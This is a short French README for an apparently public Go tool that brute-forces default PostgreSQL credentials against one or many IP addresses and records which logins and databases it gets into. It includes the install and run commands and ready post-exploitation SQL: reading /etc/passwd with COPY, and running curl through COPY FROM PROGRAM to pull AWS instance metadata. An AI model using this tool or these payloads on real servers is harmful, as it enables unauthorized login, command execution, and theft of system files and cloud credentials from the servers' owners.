
Cet outil prend une liste d'identifiants par défaut et la teste contre un serveur PostgreSQL, puis consigne ceux qui fonctionnent et les bases de données auxquelles il a accès.
Ce script Go lit une liste de noms d'utilisateur et de mots de passe depuis un fichier appelé creds.txt et les teste contre une base de données PostgreSQL.
Le script accepte une adresse IP du serveur PostgreSQL comme argument de ligne de commande ou un fichier texte contenant des adresses IP.
Si un accès est accordé, le script écrit cette sortie dans un fichier appelé pg-output.txt.
Si l'utilisateur postgres est disponible, il s'agit normalement d'un superutilisateur qui peut permettre une RCE, une LFI ou une SSRf.
go install -v github.com/RandomRobbieBF/postgres-bruteforcer@latest
go run postgres-brute.go 1.1.1.1
postgres
Récupérer /etc/passwd/
CREATE TABLE myfile (input TEXT);
COPY myfile FROM '/etc/passwd';
SELECT input FROM myfile;
SSRF - Récupérer les métadonnées AWS
CREATE TABLE weather_json (cities TEXT);
COPY weather_json FROM PROGRAM 'curl -L http://169.254.169.254/latest/meta-data/';
SELECT weather_json FROM weather_json;